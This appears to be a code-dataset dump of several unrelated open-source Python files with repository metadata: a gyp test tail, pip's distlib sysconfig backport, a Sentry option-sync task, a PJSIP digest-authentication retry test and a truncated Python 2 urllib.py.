AGAIN! Hello from the amazing prog2.in AGAIN! """ test.run_built_executable('program', chdir='relocate/src', stdout=expect) test.up_to_date('same_target.gyp', 'program', chdir='relocate/src') test.pass_test()
gpl-3.0
mdworks2016/work_development
Python/05_FirstPython/Chapter9_WebApp/fppython_develop/lib/python3.7/site-packages/pip/_vendor/distlib/_backport/sysconfig.py
54
26964
# -*- coding: utf-8 -*- # # Copyright (C) 2012 The Python Software Foundation. # See LICENSE.txt and CONTRIBUTORS.txt. # """Access to Python's configuration information.""" import codecs import os import re import sys from os.path import pardir, realpath try: import configparser except ImportError: import ConfigParser as configparser __all__ = [ 'get_config_h_filename', 'get_config_var', 'get_config_vars', 'get_makefile_filename', 'get_path', 'get_path_names', 'get_paths', 'get_platform', 'get_python_version', 'get_scheme_names', 'parse_config_h', ] def _safe_realpath(path): try: return realpath(path) except OSError: return path if sys.executable: _PROJECT_BASE = os.path.dirname(_safe_realpath(sys.executable)) else: # sys.executable can be empty if argv[0] has been changed and Python is # unable to retrieve the real program name _PROJECT_BASE = _safe_realpath(os.getcwd()) if os.name == "nt" and "pcbuild" in _PROJECT_BASE[-8:].lower(): _PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir)) # PC/VS7.1 if os.name == "nt" and "\\pc\\v" in _PROJECT_BASE[-10:].lower(): _PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir, pardir)) # PC/AMD64 if os.name == "nt" and "\\pcbuild\\amd64" in _PROJECT_BASE[-14:].lower(): _PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir, pardir)) def is_python_build(): for fn in ("Setup.dist", "Setup.local"): if os.path.isfile(os.path.join(_PROJECT_BASE, "Modules", fn)): return True return False _PYTHON_BUILD = is_python_build() _cfg_read = False def _ensure_cfg_read(): global _cfg_read if not _cfg_read: from ..resources import finder backport_package = __name__.rsplit('.', 1)[0] _finder = finder(backport_package) _cfgfile = _finder.find('sysconfig.cfg') assert _cfgfile, 'sysconfig.cfg exists' with _cfgfile.as_stream() as s: _SCHEMES.readfp(s) if _PYTHON_BUILD: for scheme in ('posix_prefix', 'posix_home'): _SCHEMES.set(scheme, 'include', '{srcdir}/Include') _SCHEMES.set(scheme, 'platinclude', '{projectbase}/.') _cfg_read = True _SCHEMES = configparser.RawConfigParser() _VAR_REPL = re.compile(r'\{([^{]*?)\}') def _expand_globals(config): _ensure_cfg_read() if config.has_section('globals'): globals = config.items('globals') else: globals = tuple() sections = config.sections() for section in sections: if section == 'globals': continue for option, value in globals: if config.has_option(section, option): continue config.set(section, option, value) config.remove_section('globals') # now expanding local variables defined in the cfg file # for section in config.sections(): variables = dict(config.items(section)) def _replacer(matchobj): name = matchobj.group(1) if name in variables: return variables[name] return matchobj.group(0) for option, value in config.items(section): config.set(section, option, _VAR_REPL.sub(_replacer, value)) #_expand_globals(_SCHEMES) # FIXME don't rely on sys.version here, its format is an implementation detail # of CPython, use sys.version_info or sys.hexversion _PY_VERSION = sys.version.split()[0] _PY_VERSION_SHORT = sys.version[:3] _PY_VERSION_SHORT_NO_DOT = _PY_VERSION[0] + _PY_VERSION[2] _PREFIX = os.path.normpath(sys.prefix) _EXEC_PREFIX = os.path.normpath(sys.exec_prefix) _CONFIG_VARS = None _USER_BASE = None def _subst_vars(path, local_vars): """In the string `path`, replace tokens like {some.thing} with the corresponding value from the map `local_vars`. If there is no corresponding value, leave the token unchanged. """ def _replacer(matchobj): name = matchobj.group(1) if name in local_vars: return local_vars[name] elif name in os.environ: return os.environ[name] return matchobj.group(0) return _VAR_REPL.sub(_replacer, path) def _extend_dict(target_dict, other_dict): target_keys = target_dict.keys() for key, value in other_dict.items(): if key in target_keys: continue target_dict[key] = value def _expand_vars(scheme, vars): res = {} if vars is None: vars = {} _extend_dict(vars, get_config_vars()) for key, value in _SCHEMES.items(scheme): if os.name in ('posix', 'nt'): value = os.path.expanduser(value) res[key] = os.path.normpath(_subst_vars(value, vars)) return res def format_value(value, vars): def _replacer(matchobj): name = matchobj.group(1) if name in vars: return vars[name] return matchobj.group(0) return _VAR_REPL.sub(_replacer, value) def _get_default_scheme(): if os.name == 'posix': # the default scheme for posix is posix_prefix return 'posix_prefix' return os.name def _getuserbase(): env_base = os.environ.get("PYTHONUSERBASE", None) def joinuser(*args): return os.path.expanduser(os.path.join(*args)) # what about 'os2emx', 'riscos' ? if os.name == "nt": base = os.environ.get("APPDATA") or "~" if env_base: return env_base else: return joinuser(base, "Python") if sys.platform == "darwin": framework = get_config_var("PYTHONFRAMEWORK") if framework: if env_base: return env_base else: return joinuser("~", "Library", framework, "%d.%d" % sys.version_info[:2]) if env_base: return env_base else: return joinuser("~", ".local") def _parse_makefile(filename, vars=None): """Parse a Makefile-style file. A dictionary containing name/value pairs is returned. If an optional dictionary is passed in as the second argument, it is used instead of a new dictionary. """ # Regexes needed for parsing Makefile (and similar syntaxes, # like old-style Setup files). _variable_rx = re.compile(r"([a-zA-Z][a-zA-Z0-9_]+)\s*=\s*(.*)") _findvar1_rx = re.compile(r"\$\(([A-Za-z][A-Za-z0-9_]*)\)") _findvar2_rx = re.compile(r"\${([A-Za-z][A-Za-z0-9_]*)}") if vars is None: vars = {} done = {} notdone = {} with codecs.open(filename, encoding='utf-8', errors="surrogateescape") as f: lines = f.readlines() for line in lines: if line.startswith('#') or line.strip() == '': continue m = _variable_rx.match(line) if m: n, v = m.group(1, 2) v = v.strip() # `$$' is a literal `$' in make tmpv = v.replace('$$', '') if "$" in tmpv: notdone[n] = v else: try: v = int(v) except ValueError: # insert literal `$' done[n] = v.replace('$$', '$') else: done[n] = v # do variable interpolation here variables = list(notdone.keys()) # Variables with a 'PY_' prefix in the makefile. These need to # be made available without that prefix through sysconfig. # Special care is needed to ensure that variable expansion works, even # if the expansion uses the name without a prefix. renamed_variables = ('CFLAGS', 'LDFLAGS', 'CPPFLAGS') while len(variables) > 0: for name in tuple(variables): value = notdone[name] m = _findvar1_rx.search(value) or _findvar2_rx.search(value) if m is not None: n = m.group(1) found = True if n in done: item = str(done[n]) elif n in notdone: # get it on a subsequent round found = False elif n in os.environ: # do it like make: fall back to environment item = os.environ[n] elif n in renamed_variables: if (name.startswith('PY_') and name[3:] in renamed_variables): item = "" elif 'PY_' + n in notdone: found = False else: item = str(done['PY_' + n]) else: done[n] = item = "" if found: after = value[m.end():] value = value[:m.start()] + item + after if "$" in after: notdone[name] = value else: try: value = int(value) except ValueError: done[name] = value.strip() else: done[name] = value variables.remove(name) if (name.startswith('PY_') and name[3:] in renamed_variables): name = name[3:] if name not in done: done[name] = value else: # bogus variable reference (e.g. "prefix=$/opt/python"); # just drop it since we can't deal done[name] = value variables.remove(name) # strip spurious spaces for k, v in done.items(): if isinstance(v, str): done[k] = v.strip() # save the results in the global dictionary vars.update(done) return vars def get_makefile_filename(): """Return the path of the Makefile.""" if _PYTHON_BUILD: return os.path.join(_PROJECT_BASE, "Makefile") if hasattr(sys, 'abiflags'): config_dir_name = 'config-%s%s' % (_PY_VERSION_SHORT, sys.abiflags) else: config_dir_name = 'config' return os.path.join(get_path('stdlib'), config_dir_name, 'Makefile') def _init_posix(vars): """Initialize the module as appropriate for POSIX systems.""" # load the installed Makefile: makefile = get_makefile_filename() try: _parse_makefile(makefile, vars) except IOError as e: msg = "invalid Python installation: unable to open %s" % makefile if hasattr(e, "strerror"): msg = msg + " (%s)" % e.strerror raise IOError(msg) # load the installed pyconfig.h: config_h = get_config_h_filename() try: with open(config_h) as f: parse_config_h(f, vars) except IOError as e: msg = "invalid Python installation: unable to open %s" % config_h if hasattr(e, "strerror"): msg = msg + " (%s)" % e.strerror raise IOError(msg) # On AIX, there are wrong paths to the linker scripts in the Makefile # -- these paths are relative to the Python source, but when installed # the scripts are in another directory. if _PYTHON_BUILD: vars['LDSHARED'] = vars['BLDSHARED'] def _init_non_posix(vars): """Initialize the module as appropriate for NT""" # set basic install directories vars['LIBDEST'] = get_path('stdlib') vars['BINLIBDEST'] = get_path('platstdlib') vars['INCLUDEPY'] = get_path('include') vars['SO'] = '.pyd' vars['EXE'] = '.exe' vars['VERSION'] = _PY_VERSION_SHORT_NO_DOT vars['BINDIR'] = os.path.dirname(_safe_realpath(sys.executable)) # # public APIs # def parse_config_h(fp, vars=None): """Parse a config.h-style file. A dictionary containing name/value pairs is returned. If an optional dictionary is passed in as the second argument, it is used instead of a new dictionary. """ if vars is None: vars = {} define_rx = re.compile("#define ([A-Z][A-Za-z0-9_]+) (.*)\n") undef_rx = re.compile("/[*] #undef ([A-Z][A-Za-z0-9_]+) [*]/\n") while True: line = fp.readline() if not line: break m = define_rx.match(line) if m: n, v = m.group(1, 2) try: v = int(v) except ValueError: pass vars[n] = v else: m = undef_rx.match(line) if m: vars[m.group(1)] = 0 return vars def get_config_h_filename(): """Return the path of pyconfig.h.""" if _PYTHON_BUILD: if os.name == "nt": inc_dir = os.path.join(_PROJECT_BASE, "PC") else: inc_dir = _PROJECT_BASE else: inc_dir = get_path('platinclude') return os.path.join(inc_dir, 'pyconfig.h') def get_scheme_names(): """Return a tuple containing the schemes names.""" return tuple(sorted(_SCHEMES.sections())) def get_path_names(): """Return a tuple containing the paths names.""" # xxx see if we want a static list return _SCHEMES.options('posix_prefix') def get_paths(scheme=_get_default_scheme(), vars=None, expand=True): """Return a mapping containing an install scheme. ``scheme`` is the install scheme name. If not provided, it will return the default scheme for the current platform. """ _ensure_cfg_read() if expand: return _expand_vars(scheme, vars) else: return dict(_SCHEMES.items(scheme)) def get_path(name, scheme=_get_default_scheme(), vars=None, expand=True): """Return a path corresponding to the scheme. ``scheme`` is the install scheme name. """ return get_paths(scheme, vars, expand)[name] def get_config_vars(*args): """With no arguments, return a dictionary of all configuration variables relevant for the current platform. On Unix, this means every variable defined in Python's installed Makefile; On Windows and Mac OS it's a much smaller set. With arguments, return a list of values that result from looking up each argument in the configuration variable dictionary. """ global _CONFIG_VARS if _CONFIG_VARS is None: _CONFIG_VARS = {} # Normalized versions of prefix and exec_prefix are handy to have; # in fact, these are the standard versions used most places in the # distutils2 module. _CONFIG_VARS['prefix'] = _PREFIX _CONFIG_VARS['exec_prefix'] = _EXEC_PREFIX _CONFIG_VARS['py_version'] = _PY_VERSION _CONFIG_VARS['py_version_short'] = _PY_VERSION_SHORT _CONFIG_VARS['py_version_nodot'] = _PY_VERSION[0] + _PY_VERSION[2] _CONFIG_VARS['base'] = _PREFIX _CONFIG_VARS['platbase'] = _EXEC_PREFIX _CONFIG_VARS['projectbase'] = _PROJECT_BASE try: _CONFIG_VARS['abiflags'] = sys.abiflags except AttributeError: # sys.abiflags may not be defined on all platforms. _CONFIG_VARS['abiflags'] = '' if os.name in ('nt', 'os2'): _init_non_posix(_CONFIG_VARS) if os.name == 'posix': _init_posix(_CONFIG_VARS) # Setting 'userbase' is done below the call to the # init function to enable using 'get_config_var' in # the init-function. if sys.version >= '2.6': _CONFIG_VARS['userbase'] = _getuserbase() if 'srcdir' not in _CONFIG_VARS: _CONFIG_VARS['srcdir'] = _PROJECT_BASE else: _CONFIG_VARS['srcdir'] = _safe_realpath(_CONFIG_VARS['srcdir']) # Convert srcdir into an absolute path if it appears necessary. # Normally it is relative to the build directory. However, during # testing, for example, we might be running a non-installed python # from a different directory. if _PYTHON_BUILD and os.name == "posix": base = _PROJECT_BASE try: cwd = os.getcwd() except OSError: cwd = None if (not os.path.isabs(_CONFIG_VARS['srcdir']) and base != cwd): # srcdir is relative and we are not in the same directory # as the executable. Assume executable is in the build # directory and make srcdir absolute. srcdir = os.path.join(base, _CONFIG_VARS['srcdir']) _CONFIG_VARS['srcdir'] = os.path.normpath(srcdir) if sys.platform == 'darwin': kernel_version = os.uname()[2] # Kernel version (8.4.3) major_version = int(kernel_version.split('.')[0]) if major_version < 8: # On Mac OS X before 10.4, check if -arch and -isysroot # are in CFLAGS or LDFLAGS and remove them if they are. # This is needed when building extensions on a 10.3 system # using a universal build of python. for key in ('LDFLAGS', 'BASECFLAGS', # a number of derived variables. These need to be # patched up as well. 'CFLAGS', 'PY_CFLAGS', 'BLDSHARED'): flags = _CONFIG_VARS[key] flags = re.sub(r'-arch\s+\w+\s', ' ', flags) flags = re.sub('-isysroot [^ \t]*', ' ', flags) _CONFIG_VARS[key] = flags else: # Allow the user to override the architecture flags using # an environment variable. # NOTE: This name was introduced by Apple in OSX 10.5 and # is used by several scripting languages distributed with # that OS release. if 'ARCHFLAGS' in os.environ: arch = os.environ['ARCHFLAGS'] for key in ('LDFLAGS', 'BASECFLAGS', # a number of derived variables. These need to be # patched up as well. 'CFLAGS', 'PY_CFLAGS', 'BLDSHARED'): flags = _CONFIG_VARS[key] flags = re.sub(r'-arch\s+\w+\s', ' ', flags) flags = flags + ' ' + arch _CONFIG_VARS[key] = flags # If we're on OSX 10.5 or later and the user tries to # compiles an extension using an SDK that is not present # on the current machine it is better to not use an SDK # than to fail. # # The major usecase for this is users using a Python.org # binary installer on OSX 10.6: that installer uses # the 10.4u SDK, but that SDK is not installed by default # when you install Xcode. # CFLAGS = _CONFIG_VARS.get('CFLAGS', '') m = re.search(r'-isysroot\s+(\S+)', CFLAGS) if m is not None: sdk = m.group(1) if not os.path.exists(sdk): for key in ('LDFLAGS', 'BASECFLAGS', # a number of derived variables. These need to be # patched up as well. 'CFLAGS', 'PY_CFLAGS', 'BLDSHARED'): flags = _CONFIG_VARS[key] flags = re.sub(r'-isysroot\s+\S+(\s|$)', ' ', flags) _CONFIG_VARS[key] = flags if args: vals = [] for name in args: vals.append(_CONFIG_VARS.get(name)) return vals else: return _CONFIG_VARS def get_config_var(name): """Return the value of a single variable using the dictionary returned by 'get_config_vars()'. Equivalent to get_config_vars().get(name) """ return get_config_vars().get(name) def get_platform(): """Return a string that identifies the current platform. This is used mainly to distinguish platform-specific build directories and platform-specific built distributions. Typically includes the OS name and version and the architecture (as supplied by 'os.uname()'), although the exact information included depends on the OS; eg. for IRIX the architecture isn't particularly important (IRIX only runs on SGI hardware), but for Linux the kernel version isn't particularly important. Examples of returned values: linux-i586 linux-alpha (?) solaris-2.6-sun4u irix-5.3 irix64-6.2 Windows will return one of: win-amd64 (64bit Windows on AMD64 (aka x86_64, Intel64, EM64T, etc) win-ia64 (64bit Windows on Itanium) win32 (all others - specifically, sys.platform is returned) For other non-POSIX platforms, currently just returns 'sys.platform'. """ if os.name == 'nt': # sniff sys.version for architecture. prefix = " bit (" i = sys.version.find(prefix) if i == -1: return sys.platform j = sys.version.find(")", i) look = sys.version[i+len(prefix):j].lower() if look == 'amd64': return 'win-amd64' if look == 'itanium': return 'win-ia64' return sys.platform if os.name != "posix" or not hasattr(os, 'uname'): # XXX what about the architecture? NT is Intel or Alpha, # Mac OS is M68k or PPC, etc. return sys.platform # Try to distinguish various flavours of Unix osname, host, release, version, machine = os.uname() # Convert the OS name to lowercase, remove '/' characters # (to accommodate BSD/OS), and translate spaces (for "Power Macintosh") osname = osname.lower().replace('/', '') machine = machine.replace(' ', '_') machine = machine.replace('/', '-') if osname[:5] == "linux": # At least on Linux/Intel, 'machine' is the processor -- # i386, etc. # XXX what about Alpha, SPARC, etc? return "%s-%s" % (osname, machine) elif osname[:5] == "sunos": if release[0] >= "5": # SunOS 5 == Solaris 2 osname = "solaris" release = "%d.%s" % (int(release[0]) - 3, release[2:]) # fall through to standard osname-release-machine representation elif osname[:4] == "irix": # could be "irix64"! return "%s-%s" % (osname, release) elif osname[:3] == "aix": return "%s-%s.%s" % (osname, version, release) elif osname[:6] == "cygwin": osname = "cygwin" rel_re = re.compile(r'[\d.]+') m = rel_re.match(release) if m: release = m.group() elif osname[:6] == "darwin": # # For our purposes, we'll assume that the system version from # distutils' perspective is what MACOSX_DEPLOYMENT_TARGET is set # to. This makes the compatibility story a bit more sane because the # machine is going to compile and link as if it were # MACOSX_DEPLOYMENT_TARGET. cfgvars = get_config_vars() macver = cfgvars.get('MACOSX_DEPLOYMENT_TARGET') if True: # Always calculate the release of the running machine, # needed to determine if we can build fat binaries or not. macrelease = macver # Get the system version. Reading this plist is a documented # way to get the system version (see the documentation for # the Gestalt Manager) try: f = open('/System/Library/CoreServices/SystemVersion.plist') except IOError: # We're on a plain darwin box, fall back to the default # behaviour. pass else: try: m = re.search(r'<key>ProductUserVisibleVersion</key>\s*' r'<string>(.*?)</string>', f.read()) finally: f.close() if m is not None: macrelease = '.'.join(m.group(1).split('.')[:2]) # else: fall back to the default behaviour if not macver: macver = macrelease if macver: release = macver osname = "macosx" if ((macrelease + '.') >= '10.4.' and '-arch' in get_config_vars().get('CFLAGS', '').strip()): # The universal build will build fat binaries, but not on # systems before 10.4 # # Try to detect 4-way universal builds, those have machine-type # 'universal' instead of 'fat'. machine = 'fat' cflags = get_config_vars().get('CFLAGS') archs = re.findall(r'-arch\s+(\S+)', cflags) archs = tuple(sorted(set(archs))) if len(archs) == 1: machine = archs[0] elif archs == ('i386', 'ppc'): machine = 'fat' elif archs == ('i386', 'x86_64'): machine = 'intel' elif archs == ('i386', 'ppc', 'x86_64'): machine = 'fat3' elif archs == ('ppc64', 'x86_64'): machine = 'fat64' elif archs == ('i386', 'ppc', 'ppc64', 'x86_64'): machine = 'universal' else: raise ValueError( "Don't know machine value for archs=%r" % (archs,)) elif machine == 'i386': # On OSX the machine type returned by uname is always the # 32-bit variant, even if the executable architecture is # the 64-bit variant if sys.maxsize >= 2**32: machine = 'x86_64' elif machine in ('PowerPC', 'Power_Macintosh'): # Pick a sane name for the PPC architecture. # See 'i386' case if sys.maxsize >= 2**32: machine = 'ppc64' else: machine = 'ppc' return "%s-%s-%s" % (osname, release, machine) def get_python_version(): return _PY_VERSION_SHORT def _print_dict(title, data): for index, (key, value) in enumerate(sorted(data.items())): if index == 0: print('%s: ' % (title)) print('\t%s = "%s"' % (key, value)) def _main(): """Display all information sysconfig detains.""" print('Platform: "%s"' % get_platform()) print('Python version: "%s"' % get_python_version()) print('Current installation scheme: "%s"' % _get_default_scheme()) print() _print_dict('Paths', get_paths()) print() _print_dict('Variables', get_config_vars()) if __name__ == '__main__': _main()
apache-2.0
gg7/sentry
src/sentry/tasks/options.py
27
1173
""" sentry.tasks.options ~~~~~~~~~~~~~~~~~~~~ :copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details. :license: BSD, see LICENSE for more details. """ from __future__ import absolute_import from datetime import timedelta from django.utils import timezone from sentry.models import Option from sentry.options import default_manager from sentry.tasks.base import instrumented_task ONE_HOUR = 60 * 60 @instrumented_task(name='sentry.tasks.options.sync_options', queue='options') def sync_options(cutoff=ONE_HOUR): """ Ensures all options that have been updated (within the database) since ``cutoff`` have their correct values stored in the cache. This **does not** guarantee that the correct value is written into the cache though it will correct itself in the next update window. """ cutoff_dt = timezone.now() - timedelta(seconds=cutoff) # TODO(dcramer): this doesnt handle deleted options (which shouldn't be allowed) for option in Option.objects.filter(last_updated__gte=cutoff_dt).iterator(): default_manager.update_cached_value( key=option.key, value=option.value, )
bsd-3-clause
VoIPGRID/PJSIP
tests/pjsua/scripts-recvfrom/231_reg_bad_fail_stale_false_nonce_changed.py
42
1562
# $Id$ import inc_sip as sip import inc_sdp as sdp # In this test we simulate broken server, where: # - it wants to signal that NONCE has change # - but it sets stale=false # For this case pjsip will retry authentication until # PJSIP_MAX_STALE_COUNT is exceeded. # pjsua = "--null-audio --id=sip:CLIENT --registrar sip:127.0.0.1:$PORT " + \ "--realm=python --user=username --password=password" req1 = sip.RecvfromTransaction("Initial request", 401, include=["REGISTER sip"], exclude=["Authorization"], resp_hdr=["WWW-Authenticate: Digest realm=\"python\", nonce=\"1\""] ) req2 = sip.RecvfromTransaction("First retry", 401, include=["REGISTER sip", "Authorization", "nonce=\"1\""], exclude=["Authorization:[\\s\\S]+Authorization:"], resp_hdr=["WWW-Authenticate: Digest realm=\"python\", nonce=\"2\", stale=true"] ) req3 = sip.RecvfromTransaction("Second retry retry", 401, include=["REGISTER sip", "Authorization", "nonce=\"2\""], exclude=["Authorization:[\\s\\S]+Authorization:"], resp_hdr=["WWW-Authenticate: Digest realm=\"python\", nonce=\"3\", stale=true"] ) req4 = sip.RecvfromTransaction("Third retry", 401, include=["REGISTER sip", "Authorization", "nonce=\"3\""], exclude=["Authorization:[\\s\\S]+Authorization:"], resp_hdr=["WWW-Authenticate: Digest realm=\"python\", nonce=\"4\", stale=true"], expect="PJSIP_EAUTHSTALECOUNT" ) recvfrom_cfg = sip.RecvfromCfg("Failed registration retry (server rejects with stale=true) ", pjsua, [req1, req2, req3, req4])
gpl-2.0
olapaola/olapaola-android-scripting
python/src/Lib/urllib.py
48
64844
"""Open an arbitrary URL. See the following document for more info on URLs: "Names and Addresses, URIs, URLs, URNs, URCs", at http://www.w3.org/pub/WWW/Addressing/Overview.html See also the HTTP spec (from which the error codes are derived): "HTTP - Hypertext Transfer Protocol", at http://www.w3.org/pub/WWW/Protocols/ Related standards and specs: - RFC1808: the "relative URL" spec. (authoritative status) - RFC1738 - the "URL standard". (authoritative status) - RFC1630 - the "URI spec". (informational status) The object returned by URLopener().open(file) will differ per protocol. All you know is that is has methods read(), readline(), readlines(), fileno(), close() and info(). The read*(), fileno() and close() methods work like those of open files. The info() method returns a mimetools.Message object which can be used to query various info about the object, if available. (mimetools.Message objects are queried with the getheader() method.) """ import string import socket import os import time import sys from urlparse import urljoin as basejoin import warnings __all__ = ["urlopen", "URLopener", "FancyURLopener", "urlretrieve", "urlcleanup", "quote", "quote_plus", "unquote", "unquote_plus", "urlencode", "url2pathname", "pathname2url", "splittag", "localhost", "thishost", "ftperrors", "basejoin", "unwrap", "splittype", "splithost", "splituser", "splitpasswd", "splitport", "splitnport", "splitquery", "splitattr", "splitvalue", "getproxies"] __version__ = '1.17' # XXX This version is not always updated :-( MAXFTPCACHE = 10 # Trim the ftp cache beyond this size # Helper for non-unix systems if os.name == 'mac': from macurl2path import url2pathname, pathname2url elif os.name == 'nt': from nturl2path import url2pathname, pathname2url elif os.name == 'riscos': from rourl2path import url2pathname, pathname2url else: def url2pathname(pathname): """OS-specific conversion from a relative URL of the 'file' scheme to a file system path; not recommended for general use.""" return unquote(pathname) def pathname2url(pathname): """OS-specific conversion from a file system path to a relative URL of the 'file' scheme; not recommended for general use.""" return quote(pathname) # This really consists of two pieces: # (1) a class which handles opening of all sorts of URLs # (plus assorted utilities etc.) # (2) a set of functions for parsing URLs # XXX Should these be separated out into different modules? # Shortcut for basic usage _urlopener = None def urlopen(url, data=None, proxies=None): """Create a file-like object for the specified URL to read from.""" from warnings import warnpy3k warnings.warnpy3k("urllib.urlopen() has been removed in Python 3.0 in " "favor of urllib2.urlopen()", stacklevel=2) global _urlopener if proxies is not None: opener = FancyURLopener(proxies=proxies) elif not _urlopener: opener = FancyURLopener() _urlopener = opener else: opener = _urlopener if data is None: return opener.open(url) else: return opener.open(url, data) def urlretrieve(url, filename=None, reporthook=None, data=None): global _urlopener if not _urlopener: _urlopener = FancyURLopener() return _urlopener.retrieve(url, filename, reporthook, data) def urlcleanup(): if _urlopener: _urlopener.cleanup() # check for SSL try: import ssl except: _have_ssl = False else: _have_ssl = True # exception raised when downloaded size does not match content-length class ContentTooShortError(IOError): def __init__(self, message, content): IOError.__init__(self, message) self.content = content ftpcache = {} class URLopener: """Class to open URLs. This is a class rather than just a subroutine because we may need more than one set of global protocol-specific options. Note -- this is a base class for those who don't want the automatic handling of errors type 302 (relocated) and 401 (authorization needed).""" __tempfiles = None version = "Python-urllib/%s" % __version__ # Constructor def __init__(self, proxies=None, **x509): if proxies is None: proxies = getproxies() assert hasattr(proxies, 'has_key'), "proxies must be a mapping" self.proxies = proxies self.key_file = x509.get('key_file') self.cert_file = x509.get('cert_file') self.addheaders = [('User-Agent', self.version)] self.__tempfiles = [] self.__unlink = os.unlink # See cleanup() self.tempcache = None # Undocumented feature: if you assign {} to tempcache, # it is used to cache files retrieved with # self.retrieve(). This is not enabled by default # since it does not work for changing documents (and I # haven't got the logic to check expiration headers # yet). self.ftpcache = ftpcache # Undocumented feature: you can use a different # ftp cache by assigning to the .ftpcache member; # in case you want logically independent URL openers # XXX This is not threadsafe. Bah. def __del__(self): self.close() def close(self): self.cleanup() def cleanup(self): # This code sometimes runs when the rest of this module # has already been deleted, so it can't use any globals # or import anything. if self.__tempfiles: for file in self.__tempfiles: try: self.__unlink(file) except OSError: pass del self.__tempfiles[:] if self.tempcache: self.tempcache.clear() def addheader(self, *args): """Add a header to be used by the HTTP interface only e.g. u.addheader('Accept', 'sound/basic')""" self.addheaders.append(args) # External interface def open(self, fullurl, data=None): """Use URLopener().open(file) instead of open(file, 'r').""" fullurl = unwrap(toBytes(fullurl)) if self.tempcache and fullurl in self.tempcache: filename, headers = self.tempcache[fullurl] fp = open(filename, 'rb') return addinfourl(fp, headers, fullurl) urltype, url = splittype(fullurl) if not urltype: urltype = 'file' if urltype in self.proxies: proxy = self.proxies[urltype] urltype, proxyhost = splittype(proxy) host, selector = splithost(proxyhost) url = (host, fullurl) # Signal special case to open_*() else: proxy = None name = 'open_' + urltype self.type = urltype name = name.replace('-', '_') if not hasattr(self, name): if proxy: return self.open_unknown_proxy(proxy, fullurl, data) else: return self.open_unknown(fullurl, data) try: if data is None: return getattr(self, name)(url) else: return getattr(self, name)(url, data) except socket.error, msg: raise IOError, ('socket error', msg), sys.exc_info()[2] def open_unknown(self, fullurl, data=None): """Overridable interface to open unknown URL type.""" type, url = splittype(fullurl) raise IOError, ('url error', 'unknown url type', type) def open_unknown_proxy(self, proxy, fullurl, data=None): """Overridable interface to open unknown URL type.""" type, url = splittype(fullurl) raise IOError, ('url error', 'invalid proxy for %s' % type, proxy) # External interface def retrieve(self, url, filename=None, reporthook=None, data=None): """retrieve(url) returns (filename, headers) for a local object or (tempfilename, headers) for a remote object.""" url = unwrap(toBytes(url)) if self.tempcache and url in self.tempcache: return self.tempcache[url] type, url1 = splittype(url) if filename is None and (not type or type == 'file'): try: fp = self.open_local_file(url1) hdrs = fp.info() del fp return url2pathname(splithost(url1)[1]), hdrs except IOError, msg: pass fp = self.open(url, data) try: headers = fp.info() if filename: tfp = open(filename, 'wb') else: import tempfile garbage, path = splittype(url) garbage, path = splithost(path or "") path, garbage = splitquery(path or "") path, garbage = splitattr(path or "") suffix = os.path.splitext(path)[1] (fd, filename) = tempfile.mkstemp(suffix) self.__tempfiles.append(filename) tfp = os.fdopen(fd, 'wb') try: result = filename, headers if self.tempcache is not None: self.tempcache[url] = result bs = 1024*8 size = -1 read = 0 blocknum = 0 if reporthook: if "content-length" in headers: size = int(headers["Content-Length"]) reporthook(blocknum, bs, size) while 1: block = fp.read(bs) if block == "": break read += len(block) tfp.write(block) blocknum += 1 if reporthook: reporthook(blocknum, bs, size) finally: tfp.close() finally: fp.close() del fp del tfp # raise exception if actual size does not match content-length header if size >= 0 and read < size: raise ContentTooShortError("retrieval incomplete: got only %i out " "of %i bytes" % (read, size), result) return result # Each method named open_<type> knows how to open that type of URL def open_http(self, url, data=None): """Use HTTP protocol.""" import httplib user_passwd = None proxy_passwd= None if isinstance(url, str): host, selector = splithost(url) if host: user_passwd, host = splituser(host) host = unquote(host) realhost = host else: host, selector = url # check whether the proxy contains authorization information proxy_passwd, host = splituser(host) # now we proceed with the url we want to obtain urltype, rest = splittype(selector) url = rest user_passwd = None if urltype.lower() != 'http': realhost = None else: realhost, rest = splithost(rest) if realhost: user_passwd, realhost = splituser(realhost) if user_passwd: selector = "%s://%s%s" % (urltype, realhost, rest) if proxy_bypass(realhost): host = realhost #print "proxy via http:", host, selector if not host: raise IOError, ('http error', 'no host given') if proxy_passwd: import base64 proxy_auth = base64.b64encode(proxy_passwd).strip() else: proxy_auth = None if user_passwd: import base64 auth = base64.b64encode(user_passwd).strip() else: auth = None h = httplib.HTTP(host) if data is not None: h.putrequest('POST', selector) h.putheader('Content-Type', 'application/x-www-form-urlencoded') h.putheader('Content-Length', '%d' % len(data)) else: h.putrequest('GET', selector) if proxy_auth: h.putheader('Proxy-Authorization', 'Basic %s' % proxy_auth) if auth: h.putheader('Authorization', 'Basic %s' % auth) if realhost: h.putheader('Host', realhost) for args in self.addheaders: h.putheader(*args) h.endheaders() if data is not None: h.send(data) errcode, errmsg, headers = h.getreply() fp = h.getfile() if errcode == -1: if fp: fp.close() # something went wrong with the HTTP status line raise IOError, ('http protocol error', 0, 'got a bad status line', None) # According to RFC 2616, "2xx" code indicates that the client's # request was successfully received, understood, and accepted. if (200 <= errcode < 300): return addinfourl(fp, headers, "http:" + url, errcode) else: if data is None: return self.http_error(url, fp, errcode, errmsg, headers) else: return self.http_error(url, fp, errcode, errmsg, headers, data) def http_error(self, url, fp, errcode, errmsg, headers, data=None): """Handle http errors. Derived class can override this, or provide specific handlers named http_error_DDD where DDD is the 3-digit error code.""" # First check if there's a specific handler for this error name = 'http_error_%d' % errcode if hasattr(self, name): method = getattr(self, name) if data is None: result = method(url, fp, errcode, errmsg, headers) else: result = method(url, fp, errcode, errmsg, headers, data) if result: return result return self.http_error_default(url, fp, errcode, errmsg, headers) def http_error_default(self, url, fp, errcode, errmsg, headers): """Default error handler: close the connection and raise IOError.""" void = fp.read() fp.close() raise IOError, ('http error', errcode, errmsg, headers) if _have_ssl: def open_https(self, url, data=None): """Use HTTPS protocol.""" import httplib user_passwd = None proxy_passwd = None if isinstance(url, str): host, selector = splithost(url) if host: user_passwd, host = splituser(host) host = unquote(host) realhost = host else: host, selector = url # here, we determine, whether the proxy contains authorization information proxy_passwd, host = splituser(host) urltype, rest = splittype(selector) url = rest user_passwd = None if urltype.lower() != 'https': realhost = None else: realhost, rest = splithost(rest) if realhost: user_passwd, realhost = splituser(realhost) if user_passwd: selector = "%s://%s%s" % (urltype, realhost, rest) #print "proxy via https:", host, selector if not host: 